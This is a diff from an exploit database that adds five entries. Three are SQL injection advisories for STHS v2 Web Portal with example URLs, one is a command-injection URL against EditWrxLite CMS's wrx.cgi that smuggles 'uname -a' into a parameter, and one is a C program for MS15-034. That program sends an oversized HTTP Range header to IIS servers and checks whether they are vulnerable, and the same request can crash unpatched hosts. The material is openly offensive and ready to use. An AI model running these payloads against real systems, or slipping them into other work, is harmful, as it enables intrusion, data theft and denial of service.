DB: 2015-04-17

5 new exploits

files.csv

@@ -33169,3 +33169,8 @@ id,file,description,date,author,platform,type,port
 36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0
 36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross Site Request Forgery Vulnerability",2012-02-13,MustLive,hardware,remote,0
 36768,platforms/php/webapps/36768.txt,"ProWiki 'id' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0
+36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
+36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
+36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
+36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability",2012-02-13,chippy1337,cgi,webapps,0
+36773,platforms/windows/dos/36773.c,"Microsoft Window - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0

platforms/cgi/webapps/36772.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51995/info
+
+EditWrxLite CMS is prone to a remote command-execution vulnerability.
+
+Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application. 
+
+http://www.example.com/editwrx/wrx.cgi?download=;uname%20-a| 

platforms/php/webapps/36769.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51991/info
+
+STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected. 
+
+ http://www.example.com/prospects.php?team=[SQLi]' 

platforms/php/webapps/36770.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51991/info
+ 
+STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+ 
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/prospect.php?team=[SQLi]' 

platforms/php/webapps/36771.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51991/info
+  
+STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+  
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/team.php?team=[SQLi]' 

platforms/windows/dos/36773.c

@@ -0,0 +1,108 @@
+/*
+ UNTESTED - MS15-034 Checker
+  
+ THE BUG:
+
+	8a8b2112 56              push    esi
+	8a8b2113 6a00            push    0
+	8a8b2115 2bc7            sub     eax,edi
+	8a8b2117 6a01            push    1
+	8a8b2119 1bca            sbb     ecx,edx
+	8a8b211b 51              push    ecx
+	8a8b211c 50              push    eax
+	8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here
+
+	ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4
+
+	BY: john.b.hale@gmai.com
+	Twitter: @rhcp011235
+*/
+
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <arpa/inet.h> 
+
+int connect_to_server(char *ip)
+{
+	int sockfd = 0, n = 0;
+
+	 struct sockaddr_in serv_addr;
+	 struct hostent *server;
+
+	if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
+    	{
+        	printf("\n Error : Could not create socket \n");
+        	return 1;
+    	}
+
+	memset(&serv_addr, '0', sizeof(serv_addr));
+	serv_addr.sin_family = AF_INET;
+    	serv_addr.sin_port = htons(80);
+	if(inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0)
+    	{
+        	printf("\n inet_pton error occured\n");
+        	return 1;
+    	}
+	if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
+    	{
+       		printf("\n Error : Connect Failed \n");
+      		return 1;
+    	} 
+
+	return sockfd;
+}
+	
+
+int main(int argc, char *argv[])
+{
+    int n = 0;
+    int sockfd;
+    char recvBuff[1024];
+
+    // Check server
+    char request[] = "GET / HTTP/1.0\r\n\r\n";
+
+    // our evil buffer
+    char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
+
+
+    if(argc != 2)
+    {
+        printf("\n Usage: %s <ip of server> \n",argv[0]);
+        return 1;
+    } 
+
+    printf("[*] Audit Started\n");
+    sockfd = connect_to_server(argv[1]);
+    write(sockfd, request, strlen(request)); 
+    read(sockfd, recvBuff, sizeof(recvBuff)-1);
+
+    if (!strstr(recvBuff,"Microsoft"))
+    {
+		printf("[*] NOT IIS\n");
+		exit(1);
+    }
+
+    sockfd = connect_to_server(argv[1]);
+    write(sockfd, request1, strlen(request1));
+    read(sockfd, recvBuff, sizeof(recvBuff)-1);
+    if (strstr(recvBuff,"Requested Range Not Satisfiable"))
+    {
+                printf("[!!] Looks VULN\n");
+                exit(1);
+    } else if(strstr(recvBuff,"The request has an invalid header name")) {
+	printf("[*] Looks Patched");
+} else
+	printf("[*] Unexpected response, cannot discern patch status");
+	
+
+		
+
+}